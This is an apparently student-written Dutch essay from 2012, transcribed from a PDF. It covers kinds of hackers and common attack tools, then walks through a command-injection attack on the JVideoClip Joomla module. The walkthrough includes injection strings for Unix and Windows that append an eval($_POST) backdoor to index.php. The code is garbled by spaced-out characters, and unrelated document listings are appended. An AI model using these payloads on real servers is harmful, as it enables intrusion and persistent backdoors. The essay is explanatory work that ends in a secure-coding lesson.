Hacken, Script Kiddies en Script Kiddie Tools

Maat: px
Weergave met pagina beginnen:

Download "Hacken, Script Kiddies en Script Kiddie Tools"

Transcriptie

1 Hacken, Script Kiddies en Script Kiddie Tools Gerben van Veenendaal juni 2012 Soorten hackers Er is niet zoiets als de hacker. Binnen de hackingcommunitie bestaan verschillende stromingen. De verschillende soorten hackers zijn: Hacker of White Hat Hacker Een hacker is iemand die inbreekt in computersystemem. Dit doet hij echter niet voor geldelijk gewin. De hacker gaat de uitdaging aan om een van te voren bepaald systeem te penetreren. Hij gaat net zo lang door tot hij een manier gevonden heeft om in het syteem in te breken. De hacker heeft een zeer goede kennis van zo n beetje alle computertechnologie. De hacker heeft onder andere een zeer goede kennis van assembly. Hij weet welke denkfouten de meeste programmeurs maken en buit die uit. Na een succesvolle inbraak zal hij een bericht achterlaten op het systeem of versturen aan de systeembeheerder over de inbraak en hoe deze te voorkomen is. Hierna zal hij een moeilijker te penetreren systeem proberen te hacken. De hacker wil laten zien hoe slecht de beveiliging is van veelgebruikte systemen. Hackers ergeren er zich aan dat hun activiteiten illegaal zijn. Een hacker wordt ook wel een white hat hacker genoemd. Cracker of Black Hat Hacker De cracker of black hat hacker heeft dezelfde vaardigheden als de hacker, maar gebruikt deze wel voor geldelijk gewin of kwalijke doeleinden. Zijn doel is om geld te verdienen, systemen te vernielen of zijn ideologie te verspreiden. Een hacker een cracker noemen is een grote belediging. Ook ergeren hackers zich eraan dat de media de definities vaak door elkaar haalt. Gray Hat Hacker De gray hat hacker valt tussen de vorige twee definities in. Het is hem niet om geldelijk gewin te doen, maar af en toe een grap uit halen met een systeem moet kunnen. Bijvoorbeeld door de tekst van een nieuwsbericht op een nieuwssite een klein beetje aan te passen. De gray hat hacker contacteert vaak een bedrijf niet, maar geeft de manier van het uitbuiten van het lek (de exploit) vrij aan het publiek. Vervolgens kijkt hij hoe het bedrijf erop reageert. Hij is bereid om de wet te overtreden (anders dan het inbreken in een systeem) om verbetering van de beveiliging te bewerkstelligen. De meeste echte hackers zijn gray hat hackers. 1

2 Script Kiddie De script kiddie hackt omdat het stoer is. Hij weet niet heel veel van de technologie af, maar doet wel alsof. Hij is erg goed in het drukken van knoppen. Hij gebruikt het hacken om zijn populariteit te vergroten, niet om de kick om een complex probleem op te lossen. Hackers ergeren zich aan script kiddies omdat het hen om de technogie te doen is, en de hackerscommunitie een slechte naam geven. De script kiddie hackt niet echt, maar gebruikt tools die het hacken voor hem doen. Deze tools zijn geschreven door hackers. De script kiddie kiest niet eerst zijn doel, en hackt die vervolgens. Hij kiest eerst zijn middel (de tools), en kijkt vervolgens waar hij dat middel op toe kan passen. 2

3 Script Kiddie Tools Script kiddies zijn dus zo sterk als hun tools. Maar welke tools zijn er zoal, en waar worden ze voor gebruikt? Hieronder een overzicht van enkele gebruikte tools. De Exploit De exploit is een belangrijke tool. Een exploit is een geautomatiseerde hack in de vorm van een script. Deze scripts kunnen in allerlei talen geschreven worden. Veelgebruikte talen zijn Perl, Ruby, Python, Bash, C en Assembly. Exploits zijn voor de meeste gevonden lekken binnen enkele dagen online. Vaak presenteert een hacker zijn gevonden lek ook met een exploit die het uitbuit. Exploits zijn te vinden in online databases, waarin je kunt zoeken op de software die je wilt hacken. Een echte hacker maakt exploits, maar script kiddies gebruiken ze slechts. Vaak zijn de exploits gedeeltelijk configureerbaar, zodat je een bijvoorbeeld een doel in kunt stellen, of andere informatie die nodig is voor de lek. Dit maakt dat er nog enige moeite vereist is om de exploit uit te voeren. Tegenwoordig bestaat er ook een geautomatiseerde exploit-uitvoer-tool, die ook de configuratie overbodig maakt. Hierover later meer. Figuur 1: Een exploit database website. 3

4 C99madShell C99madShell is een tool die gebruikt wordt voor het hacken van servers. Het is één lang PHP script, dat geupload moet zijn om hem te gebruiken. Eerst moet er dus een mogelijkheid zijn om een PHP bestand op de website te uploaden, bijvoorbeeld door een exploit uit te voeren. Daarna kun je de tool gebruiken om je mogelijkheden op de server gemakkelijk uit te breiden. De tool heeft veel mogelijkheden: het heeft een file browser om bestanden te bekijken, een command line interface om commando s uit te voeren, het kan alle PHP informatie laten zien (modules, instellingen, etc.), je kunt er de lopende processen mee bekijken, het kan bestanden uploaden, zoeken, bewerken en verwijderen, SQL uitvoeren, PHP code uitvoeren, FTP wachtwoorden bruteforcen en nog veel meer. Het script zelf is ongeveer 45 Kb en gebruikt een simpele methode om de broncode te verkleinen en te verbergen. Het bevat de volgende PHP code: e v a l ( g z i n f l a t e ( base64_decode ( Lange ge g z i p t e base64 geencodeerde s t r i n g. ) ) ) ; Zelfs een script kiddie kan dat nog gemakkelijk decoderen. Gzip comprimeert code ongeveer tot 30% van de oorspronkelijke grootte. Base64 vergroot de code echter met 33%. Hoewel het de code niet zo goed obfuscate, zorgt het dus wel voor een reductie van 60% in grootte van de code. Figuur 2: C99madShell 2.0 madnet edition in actie. 4

5 SpyEye en Zeus SpyEye en Zeus zijn viruscreatietools. Ze bieden beide een gemakkelijke applicatie waarmee je je eigen trojan kunt bouwen. Deze applicatie biedt een aantal opties om het virus te laten voldoen aan je persoonlijke behoeften. Zo bieden ze bijvoorbeeld de mogelijkheid om keylogging in het virus te stoppen. Deze optie maakt ook screenshots als een gebruiker klikt, voor onscreen toetsenborden. Ook kan met het aangemaakte virus automatisch creditcardgegevens verzameld worden. SpyEye heeft ook de mogelijkheid om zelfgemaakte plugins toe te voegen. Deze plugins worden ook commercieel verkocht. Zo is er een plugin waarmee je willekeurige commando s uit kunt voeren op het doelsysteem. SpyEye heeft verder nog de optie om zijn concurrent Zeus uit te schakelen. Je moet een IP-adres aangegeven waar de gegevens naar worden verstuurd. In een administratiepaneel van het virus kun je dan alle verzamelde gegevens bekijken. Beide virustools worden commercieel verkocht op hackersforums. Er verschijnen regelmatig updates met support voor nieuwe platformen of met nieuwe security-omzeil-technieken. Ironisch genoeg verschijnen op dezelfde forums ook cracks voor de tools waarmee je de trial versie kunt activeren. Deze tools zijn erg bruikbaar om botnets op te zetten. Het aangemaakte virus verspreid zich echter niet automatisch. Figuur 3: SpyEye trojan generator en Zeus zijn administratie paneel. Packer Een packer is een tool die een executable neemt en deze comprimeert en (white box) encrypteert. Hij voegt een loader toe die vervolgens deze geëncrypteerde data decrypteert en uitvoert. Ook zitten er vaak technieken in om de code te obfuscaten. Obfuscation is een techniek die assemblycode slecht leesbaar maakt, en static analysers het verkeerde spoor zet. Packers voegen bijvoorbeeld random data in, en jumpen hier vervolgens overeen. Ook laten ze het lijken alsof bepaalde stukken assembly methoden zijn, terwijl dat niet zo is. Packers voegen ook vaak anti-debugger checks in. Zo voegt hij bijvoorbeeld een check in die bepaalde assembly afloopt om te kijken of er breakpoints zijn ingevoegd. 5

6 Het doel van de hacker met deze tool is voornamelijk om analyse van een virus moeilijk te maken, zodat virusscanners de executable niet detecteren als een virus. Een bekende packer is de open source packer UPX, maar er zijn er nog veel meer, met allemaal verschillende features. TrojanToWorm TrojanToWorm is een tool om een bestaande trojan om te zetten in een worm. Een trojan is een virus die zelf geen middelen heeft om zich voort te planten. Een worm plant zich wel voort. Deze tool voegt dus de mogelijkheid toe aan een virus om zich voort te planten. Zo infecteert het automatisch USB sticks zodat als ze in een andere computer worden ingeplugd, ze het virus verspreiden. Ook zitten er trucks in om virusscanners te omzeilen, ervoor te zorgen dat het virus niet twee keer draait, en packing met de bekende UPX packer. Figuur 4: TrojanToWorm 2.0 in actie. IP en Port Scanner Een IP scanner is een tool waarmee je een range van IP-addressen kunt pingen om te kijken of ze bestaan. Sommige tools bedenken zelf ranges en laten de gebruiker instellen hoe veel live IP-addressen ze willen hebben. Een script kiddie kan hiermee potentiele doelen vinden voor aanvallen met exploits. 6

7 Een port scanner scant voor een bepaald IP-adres een reeks bekende poorten af op zoek naar services. Dit doet hij simpelweg door met elke poort een TCP connectie op te zetten en te kijken of het lukt. Vaak zitten port scanners bij IP scanners inbegrepen. Port scanners worden veel gebruikt door hackers omdat het de enige methode is om te kijken welke services een machine draait als je geen toegang tot de machine hebt. Metasploit Metasploit is een tool die hacken automatiseert. Er zit een IP en port scanner in waarmee je een range IP-adressen kunt scannen. Metasploit detecteert automatisch welke services er op de machines draaien en geeft hier een overzicht van. Vervolgens zoekt Metasploit bij de versies van de draaiende services alle gepubliceerde exploits op. Deze draait hij dan één voor één. Je kunt ook zelf exploits selecteren die uitgevoerd moeten worden. Om een exploit te laten werken in Metasploit moet hij in Ruby geschreven zijn en het Metasploit framework gebruiken. Een Metasploit exploit heeft twee fasen: een detectiefase waarin gedetecteerd wordt of de hack uitgevoerd kan worden en een uitvoeringsfase waarin hij daadwerkelijk uitgevoerd wordt. Een Metasploit exploit geef je vaak een payload mee, dat is een stuk code die je wilt uitvoeren op het doelsysteem. Metasploit biedt zelf al vele van zulke payloads aan, zoals bijvoorbeeld een shell payload, waarmee je willekeurige commando s kunt uitvoeren op het systeem, of een VNC server waarmee je het doelsysteem kunt overnemen. Figuur 5: Metasploit pro in actie. 7

8 Een voorbeeldhack van JVideoClip In dit hoofdstuk zal ik een voorbeeld geven van hoe een hack gedaan wordt, en waar de script kiddie met zijn tools te voorschijn komt. Het doel opstellen en zwakheden zoeken Stel, we willen een bepaalde site hacken. Allereerst onderzoeken we ons doel. We kijken welke frameworks de site gebruikt, en wat voor software het systeem draait. Verder kijken we naar mogelijke zwakheden in het systeem. Het blijkt dat het desbetreffende systeem op Joomla draait, een populair webframework. Ook blijkt dat het de gebruiker in staat stelt om filmpjes te uploaden met behulp van een Joomla module, JVideoClip. In code voor het uploaden van bestanden worden vaak fouten gemaakt. Dit is dus een mogelijke zwakke plek van het systeem. De uploadprocedure De JVideoClip module is open source, en dus gaan we op zoek naar zwakheden in de code. Omdat een upload procedure vaak fouten bevat, bekijken we deze goed. De code listing van het uploadmechanisme staat in site/controller.php en bevat: //add video $ a r r v i d e o = $_FILES [ video ] ; f o r ( $ i = 0 ; $ i < count ( $ a r r v i d e o [ name ] ) ; $ i++) { $filename_ without_ ext = md5( microtime ( ) ) ; $ext_pos = s t r r c h r ( $ a r r v i d e o [ name ] [ $ i ],. ) ; $ v i d e o f u l l p a t h = $upload_folder. DS. $filename_without_ext. $ext_pos ; $filename_without_ext_fullpath = $upload_folder. DS. $filename_without_ext ; move_uploaded_file ( $ a r r v i d e o [ tmp_name ] [ $ i ], $ v i d e o f u l l p a t h ) ; c o n v e r t v i d e o ( $ v i d e o f u l l p a t h, $filename_without_ext_fullpath ) ;... Het eerste wat dit stukje probeert te doen is een niet te raden oneway hash aanmaken met hehulp van het Message-Digest-5 algoritme van de huidige tijd. De functie microtime geeft de huidige tijd in milliseconden van het systeem. Hoewel deze niet te raden is, is hij wel te bruteforcen. De huidige tijd in seconden kan namelijk makkelijk verkregen worden, en er zijn maar 1000 milliseconden in een seconde, dus met 2000 pogingen is deze hash goed te bruteforcen. Dit is dus geen goede methode. Beter zou het zijn om een hash te maken van een random string met voldoende entropie. Vervolgens pakt hij de extensie van de bestandsnaam die we uploaden. Dit doet hij door het stuk van de bestandsnaam vanaf de laatste punt te nemen. Het script verplaatst dan het 8

9 bestand van zijn tijdelijke locatie naar een nieuwe locatie door als bestandsnaam de hash te nemen en als extensie de originele extensie. Merk op dat dit erg gevaarlijk is. De hash is te bruteforcen, en de extensie kan bijvoorbeeld php zijn. Als de locatie dus bereikbaar is via de webserver, dan is het vrij triviaal om code te uploaden en uit te voeren. Dat deze hack niet mogelijk is zullen we later laten zien. De volgende stap is het converteren van de geuploade video. Dit wordt gedaan met behulp van een convertvideo functie in site/libraries/common.php die de volgende definitie heeft: f u n c t i o n c o n v e r t v i d e o ( $adres, $filename_without_ext_fullpath ) { g l o b a l $mainframe ; $par = &$mainframe >getparams ( com_jvideoclip ) ; $str_ffmpeg_path = $par >g e t ( ffmpeg_path ) ; $ s t r _ f l v t o o l 2 _ p a t h = $par >get ( f l v t o o l 2 _ p a t h ) ; i f ( s t r i p o s (php_uname( s ), windows )!== f a l s e ) { exec ( $str_ffmpeg_path. " i \" ". $adres. " \" ar ab 64 b 750k r 25 f f l v y s 320 x240 \" ". $filename_without_ext_fullpath. ". f l v \" 2>&1 ", $res, $ e r r ) ; exec ( $ s t r _ f l v t o o l 2 _ p a t h. " U \" ". $filename_without_ext_fullpath. ". f l v \" " ) ; exec ( $str_ffmpeg_path. " y i \" ". $filename_without_ext_fullpath. ". f l v \" f mjpeg s 150 x110 vframes 1 s s 8 an \" ". $filename_without_ext_fullpath. ". small. jpg \" " ) ; e l s e { exec ( $str_ffmpeg_path. " i ". $adres. " ar ab 64 b 750 k r 25 f f l v y s 320 x240 ". $filename_without_ext_fullpath. ". f l v 2>&1 ", $res, $ e r r ) ; exec ( $ s t r _ f l v t o o l 2 _ p a t h. " U ". $filename_without_ext_fullpath. ". f l v " ) ; exec ( $str_ffmpeg_path. " y i ". $filename_without_ext_fullpath. ". f l v f mjpeg s 150 x110 vframes 1 s s 8 an ". $filename_without_ext_fullpath. ". small. jpg " ) ; i f ( J F i l e : : e x i s t s ( $adres ) ) { J F i l e : : d e l e t e ( $adres ) ; Hier wordt met een bepaalde videoconversietool het verplaatste bestand omgezet in een flv bestand. Dit wordt gedaan via de command line. Merk op dat de variabele adres hier als veilig wordt beschouwd en zonder escaping ingevoegd wordt. Onder Windows wordt het pad nog gequote. Onder andere systeem niet eens. We weten echter dat we de extensie van het pad in adres volledig zelf kunnen bepalen. We zouden dus een command line injectie kunnen proberen. Aan het eind van de code wordt nog het originele bestand verwijderen. Dat is de reden dat de code upload hack niet werkt, het bestand wordt namelijk direct weer verwijderd. 9

10 Injectie via bestandsnaam We willen dus de command line injecten via een bestandnaamextensie. De volgende vraag luidt dus: wat laat PHP toe aan tekens voor bestandsnamen? Dit hangt er vanaf hoe PHP de RFC 1867 (Form Based File Upload in HTML) implementeerd. Het code gedeelte dat we nodig hebben staat in main/rfc1867.c en is: i f ( ( cd = php_mime_get_hdr_value ( header, " Content D i s p o s i t i o n " ) ) ) { char p a i r = NULL; while ( i s s p a c e ( cd ) ) { ++cd ; while ( cd && ( p a i r = php_ap_getword(&cd, ; ) ) ) { char key = NULL, word = p a i r ; while ( i s s p a c e ( cd ) ) { ++cd ; i f ( s t r c h r ( pair, = ) ) { key = php_ap_getword(& pair, = ) ; i f (! strcasecmp ( key, " name " ) ) { i f ( param ) { e f r e e ( param ) ; param = php_ap_getword_conf(& p a i r TSRMLS_CC) ; e l s e i f (! strcasecmp ( key, " f i l e n a m e " ) ) { i f ( f i l e n a m e ) { e f r e e ( f i l e n a m e ) ; f i l e n a m e = php_ap_getword_conf(& p a i r TSRMLS_CC) ;... char s = s t r r c h r ( filename, \\ ) ; i f ( ( tmp = s t r r c h r ( filename, / ) ) > s ) { s = tmp ; i f ( s && s >= f i l e n a m e ) { s a f e _ p h p _ r e g i s t e r _ v a r i a b l e ( lbuf, s +1, s t r l e n ( s +1), NULL, 0 TSRMLS_CC) ; e l s e { s a f e _ p h p _ r e g i s t e r _ v a r i a b l e ( lbuf, filename, s t r l e n ( f i l e n a m e ), NULL, 0 TSRMLS_CC) ;... 10

11 De header waarin de bestandnaam staat heeft de vorm: Content D i s p o s i t i o n : attachment ; f i l e n a m e=" bestandnaam. e x t e n s i e " Bovenstaande code detecteert deze header en haalt de filename eruit met de functie php_ap_getword_conf. Deze functie laat alle characters door, dus geeft geen beperkingen op de inhoud. Later in de code wordt echter alles tot en met de laatste back slash of forward slash weggehaald. Die tekens kunnen we dus niet gebruiken. Omdat we een extensie injecteren, kunnen we ook geen punt gebruiken. Dit limiteert ons behoorlijk, want dit zijn veelgebruikte tekens in commando s. Code execution Uiteindelijk willen we willekeurige PHP code kunnen uitvoeren op de server. Dit kunnen we doen door bijvoorbeeld de volgende code aan het einde van index.php toe te voegen: e v a l ($_POST[ code ] ) ; Zo kunnen we via een HTTP POST request met een code waarde onopgemerkt PHP code uitvoeren. Normaal zouden we zoiets doen met: echo e v a l ($_POST[ code ]); > > index. php Maar dat gebruikt een punt, waardoor het niet werkt. In plaats hiervan kunnen we een for loop gebruiken die alleen over index.php loopt met behulp van een wildcard: ; f o r f i n index php ; do echo e v a l ($_POST[ code ]); > > $ f ; done ; Onder Windows werkt dat niet, daar gebruiken we: " f o r %G IN ( index php ) DO echo e v a l ($_POST[ code]);>>%g echo " Merk op dat we onder Windows ook nog even de quote moeten sluiten. Als we bovenstaande code als de extensie gebruiken van een bestandsnaam die we uploaden, is de hack compleet. De exploit Natuurlijk willen we deze hack niet handmatig uitvoeren, al was het alleen al omdat Windows ons niet toestaat een bestand aan te maken met een quote erin. Dus maken we een exploit in Ruby die het Metasploit framework gebruikt. We geven de mogelijkheid om een PHP payload te specificeren die uitgevoerd moet worden. Ten slotte uploaden we de exploit op een exploit database site om hem publiek te maken. Conclusie Wat we van deze aanval kunnen leren is dat je nooit data moet vertrouwen die van de gebruiker komt. Zelfs niet een extensie van een bestandsnaam die geupload wordt. Escape altijd de data die binnenkomt voordat je hem gebruikt in bijvoorbeeld een commando. 11

XAMPP Web Development omgeving opzetten onder Windows.

XAMPP Web Development omgeving opzetten onder Windows. XAMPP Web Development omgeving opzetten onder Windows. Inhoudsopgave 1. Lees dit eerst... 2 2. Inleiding... 2 1 Xampp downloaden... 2 2 Installatie Xampp 1.7.4 op externe harddisk... 3 3 XAMPP herconfiguren...

Nadere informatie

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen Installeer Apache2: Deze howto gaat over name based virtual hosting onder Apache 2.x., en is getest onder OpenSUSE 11 maar is in feite ook van toepassing op de andere distributies. Alleen Debian en afgeleide

Nadere informatie

Xampp Web Development omgeving opzetten onder Windows.

Xampp Web Development omgeving opzetten onder Windows. Xampp Web Development omgeving opzetten onder Windows. Inhoudsopgave 1. Lees dit eerst... 2 2. Inleiding... 2 3. Installatie Xampp... 3 1.1 Installatie Xampp Launcher... 7 1.2 Controle geïnstalleerde bestanden...

Nadere informatie

Handleiding Beveiligen van Wordpress

Handleiding Beveiligen van Wordpress Handleiding Beveiligen van Wordpress Deze handleiding beschrijft de stappen die u dient te nemen om uw Wordpress website te beveiligen Versie 1.0 Kies een sterk wachtwoord Gebruik als wachtwoord een combinatie

Nadere informatie

Opmerkingen kan je mailen naar: A. Kouters: A. Steijlen: Versie Datum Opmerkingen

Opmerkingen kan je mailen naar: A. Kouters: A. Steijlen: Versie Datum Opmerkingen Deze handleiding is met de nodige zorg samengesteld. Het kan echter voorkomen dat sommige zaken niet goed of onduidelijk zijn beschreven. Mocht je iets tegenkomen wat niet of slecht is beschreven horen

Nadere informatie

KLIC-WIN. B2B Pilot Netinformatie. Handleiding om in de testfase bestanden te uploaden naar de NTD (ook voor grote bestanden)

KLIC-WIN. B2B Pilot Netinformatie. Handleiding om in de testfase bestanden te uploaden naar de NTD (ook voor grote bestanden) KLIC-WIN B2B Pilot Netinformatie Handleiding om in de testfase bestanden te uploaden naar de NTD (ook voor grote bestanden) Bart Thevis Enexis Geo-ICT 1-4-2017 Inleiding In het kader van het inrichten

Nadere informatie

De voordelen van Drupal

De voordelen van Drupal Drupal is een open source Content Management System (CMS). Daarnaast kun je Drupal zien als een framework, dit betekent dat je modules (oftewel mini-applicaties) kunt implementeren in je installatie van

Nadere informatie

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities De Nessus scan We hebben ervoor gekozen om de webserver met behulp van Nessus uitvoerig te testen. We hebben Nessus op de testserver laten draaien, maar deze server komt grotendeels overeen met de productieserver.

Nadere informatie

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop 1 Agenda Injection Cross Site Scripting Session Hijacking Cross Site Request Forgery #1 OWASP #2 top 10 #3 #5 Bezoek www.owasp.org

Nadere informatie

Installatiehandleiding 2.x

Installatiehandleiding 2.x Installatiehandleiding 2.x Voorwoord Hierbij de installatiehandleiding voor onze plugin met Magento 2.x. Bij vragen kunt u support aanvragen via een e-mail naar ict@parcelpro.nl of bellen naar 085 273

Nadere informatie

Joomla & Security. Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007

Joomla & Security. Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007 Joomla & Security Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007 2 Over mij Gertjan Oude Lohuis Studie: informatica Platformontwikkelaar/beheerder bij Byte. Uit rol van beheerder, maar ook uit

Nadere informatie

IdentySoft Basic Support Handleiding EasySecure International B.V.

IdentySoft Basic Support Handleiding EasySecure International B.V. IdentySoft Basic Support Handleiding EasySecure International B.V. +31(0)88 0000 083 Info@EasySecure.nl www.easysecure.nl Om onze dealers zo goed mogelijk bij te staan hebben wij het volgende document

Nadere informatie

Port Redirection & Open Ports

Port Redirection & Open Ports Port Redirection & Open Ports Port Redirection & Open Ports In de DrayTek kunt u gebruik maken van zowel Port Redirection (ook wel Port Forwarding genoemd) en Open Ports. In deze handleiding zullen wij

Nadere informatie

1.4.1 WordPress online WordPress-software Open source Forums 4

1.4.1 WordPress online WordPress-software Open source Forums 4 Inhoud Hoofdstuk 1 WordPress 1.1 Site bouwen 1 1.1.1 Software 1 1.1.2 CMS 1 1.2 Webdesign 1 1.3 Waarom WordPress? 2 1.3.1 CMS 2 1.3.2 WordPress 2 1.4 Wat is WordPress? 3 1.4.1 WordPress online 3 1.4.2

Nadere informatie

Kies File>New>Blank Page>PHP. Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site

Kies File>New>Blank Page>PHP. Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site Kies File>New>Blank Page>PHP Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site Geef de site een passende naam. Kies ook de juiste map voor de webdocumenten.

Nadere informatie

Handleiding Migratie. Bronboek Professional

Handleiding Migratie. Bronboek Professional Handleiding Migratie Bronboek Professional Laatste wijziging: 25/02/2015 Inhoudsopgave Controles en acties vooraf pag. 1 Installatie en configuratie Microsoft SQL met de Bronboek Helpdesk Tool pag. 3 Migratie

Nadere informatie

Analyse probleem remote execution

Analyse probleem remote execution Analyse probleem remote execution Karel Nijs 2005-09-28 1.1 Beschrijving van het project De bedoeling van de GUI is een gemakkelijke uitvoering van verschillende checks van ICs. De GUI moet in Tcl/Tk ontworpen

Nadere informatie

Installatie SQL: Server 2008R2

Installatie SQL: Server 2008R2 Installatie SQL: Server 2008R2 Download de SQL Server 2008.exe van onze site: www.2work.nl Ga naar het tabblad: Downloads en meld aan met: klant2work en als wachtwoord: xs4customer Let op! Indien u een

Nadere informatie

Screencast-O-Matic HANDLEIDING

Screencast-O-Matic HANDLEIDING Screencast-O-Matic HANDLEIDING Inhoud 1 Inleiding 3 2 Stap voor stap 3 3 Conclusie 9 4 Meer info 10 4.1 Hulp nodig? 10 4.2 Vragen en opmerkingen 10 4.3 Trefwoordenlijst 10 4.4 Lijst met afbeeldingen 10

Nadere informatie

Installatiehandleiding King Webservices 2.0

Installatiehandleiding King Webservices 2.0 Inhoud Inleiding... 2 Installatie en configuratie King Webservices... 2 King Webservices systeemeisen... 2 King Webservices installatie-eisen... 2 King Webservices installeren... 2 King Webservices inrichten

Nadere informatie

Priva Blue ID Network scanner / Syslog Tool

Priva Blue ID Network scanner / Syslog Tool Priva Blue ID Network scanner / Syslog Tool Versie 1.3.15.0 Bladzijde 1 Inhoudsopgave Inhoudsopgave... 2 Introductie:... 3 Systeemeisen:... 4 Installeren op een SX100:... 5 De Werking:... 6 Scannen van

Nadere informatie

Manual e-mail. Aan de slag. in beroep en bedrijf. Manual e-mail

Manual e-mail. Aan de slag. in beroep en bedrijf. Manual e-mail Aan de slag in beroep en bedrijf Branche Uitgevers 1 Alle rechten voorbehouden. Niets uit deze uitgave mag worden verveelvoudigd, opgeslagen in een geautomatiseerd gegevensbestand dan wel openbaar gemaakt

Nadere informatie

VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09

VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09 VERSLAG BICS INSTRUCTIIEFIILMPJES VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09 Inhoudsopgave Gebruik BICS..blz. 3 Onderzoek naar korte instructiefilms...blz. 3 Onderzoek naar screenrecorders.blz.

Nadere informatie

16. Web Station. In dit hoofdstuk komen de volgende onderwerpen aan bod:

16. Web Station. In dit hoofdstuk komen de volgende onderwerpen aan bod: 16. Web Station U kunt uw QNAP NAS gebruiken om een website te hosten. U kunt zelf een website bouwen in HTML of gebruik maken van één van de vele content management systemen die beschikbaar worden gesteld

Nadere informatie

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.

Nadere informatie

Web Presence Builder. Inhoud

Web Presence Builder. Inhoud Web Presence Builder Inhoud Inhoud... 1 Wat is Web Presence Builder?... 2 Het categoriescherm... 2 De eerste stappen naar een eigen website... 3 Onderwerp selecteren en website naam aanpassen... 3 Vooraf

Nadere informatie

Installatie en configuratie documentatie

Installatie en configuratie documentatie Installatie en configuratie documentatie Assistance Web Portal v. 2.x Voor Windows 2003 / XP / Vista Assistance PSO handleiding, uitgegeven door Assistance Software. Alle rechten voorbehouden. Niets uit

Nadere informatie

Tutorial voor FTP, STMP en Telnet

Tutorial voor FTP, STMP en Telnet Tutorial voor FTP, STMP en Telnet Created by Benny Wouters on December 26, 2003 (1) Telnet commando s 1.1 Tabel met telnet commando s TELNET [host [port]] Open host [port] telnet sessie opstarten Maak

Nadere informatie

Installatie en configuratie documentatie

Installatie en configuratie documentatie Installatie en configuratie documentatie Assistance Web Portal v. 2.58, 2.60 Voor Windows 2003 / 2008 / XP / Vista / Windows 7 Assistance PSO handleiding, uitgegeven door Assistance Software. Alle rechten

Nadere informatie

VKblog-importer : De gebruiksaanwijzing.

VKblog-importer : De gebruiksaanwijzing. VKblog-importer : De gebruiksaanwijzing. deze gebruiksaanwijzing beschrijft versie 0.1.2 VKblog-importer is een plugin voor WordPress die bedoeld is om blogs van VKblog te importeren in WordPress. Posts

Nadere informatie

TECHNICAL DESIGN DOCUMENT

TECHNICAL DESIGN DOCUMENT TECHNICAL DESIGN DOCUMENT BACHELORPROJECT IN3405 John Ciocoiu 1358227 Elwin Dokter 1275909 TECHNISCHE UNIVERSITEIT DELFT FACULTEIT EWI WOENSDAG 28 APRIL 2010 VERSIE 1 COMMISSIE: Ing. D.J. van Roest (opdrachtgever)

Nadere informatie

Over PHP. PHP en MySQL. 1.1 Inleiding. In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze

Over PHP. PHP en MySQL. 1.1 Inleiding. In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze Over PHP 1.1 Inleiding In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze programmeertaal? En hoe is het ontstaan? Ook leer je welke editors je kunt gebruiken om PHP-scripts te maken en hoe je eenvoudig

Nadere informatie

LES 3: XAMPP OF MAMP. Lesoverzicht:

LES 3: XAMPP OF MAMP. Lesoverzicht: LES 3: XAMPP OF MAMP Lesoverzicht: Aan de slag Wat is XAMPP (Windows & Linux) Installatie XAMPP Gebruik van XAMPP Wat is MAMP (Mac) Installatie MAMP Gebruik van MAMP Samenvatting Tijd: 15 minuten Doel:

Nadere informatie

Publiceren met WordPress

Publiceren met WordPress Publiceren met WordPress Peter Osterop Tweede herziene editie 1. Installatie van WordPress 2. Configuratie van WordPress 3. Het uiterlijk van WordPress 4. Pagina s en berichten maken in WordPress 1 Installatie

Nadere informatie

WordPress in het Kort

WordPress in het Kort WordPress in het Kort Een website maken met Wordpress. In minder dan één uur online! Inclusief installatie van een thema en plugins Alle rechten 2013, Rudy Brinkman, BrinkhostDotCom, http://www.brinkhost.nl

Nadere informatie

Belangrijk: Voordat u een VPN tunnel creëert dient u ervoor te zorgen dat de datum en tijd instellingen van de router juist staan ingesteld.

Belangrijk: Voordat u een VPN tunnel creëert dient u ervoor te zorgen dat de datum en tijd instellingen van de router juist staan ingesteld. OpenVPN OpenVPN De Vigor3900 en Vigor2960 ondersteunen OpenVPN vanaf firmware versie 1.4.0. OpenVPN biedt vele configureerbare parameters. Een netwerkbeheerder kan ervoor kiezen om TCP of UDP te gebruiken

Nadere informatie

Handleiding foto s uploaden Gallery 3

Handleiding foto s uploaden Gallery 3 Handleiding foto s uploaden Gallery 3 Versie 3 November 2012 De eerste versie van deze handleiding (mei 2012) is gemaakt door Mike Zuidema. In eerste instantie voor de Pixcie, maar uiteindelijk voor alle

Nadere informatie

Planbord installatie instructies

Planbord installatie instructies Planbord installatie instructies Uit Comprise Wiki Inhoud 1 Basis installatie 1.1 Installeren 1.1.1 Microsoft Data Access Components 1.2 De eerste keer starten 2 Veelgestelde vragen 2.1 "Network resource

Nadere informatie

Aanmelden Na installatie wordt de service automatisch gestart en kunt u meteen aanmelden van op afstand:

Aanmelden Na installatie wordt de service automatisch gestart en kunt u meteen aanmelden van op afstand: Remote administratie Als administrator hebt u verschillende mogelijkheden om een Linux systeem van op afstand te beheren. Populaire toepassingen zijn bijvoorbeeld Webmin en VNC. Het gebruik van deze twee

Nadere informatie

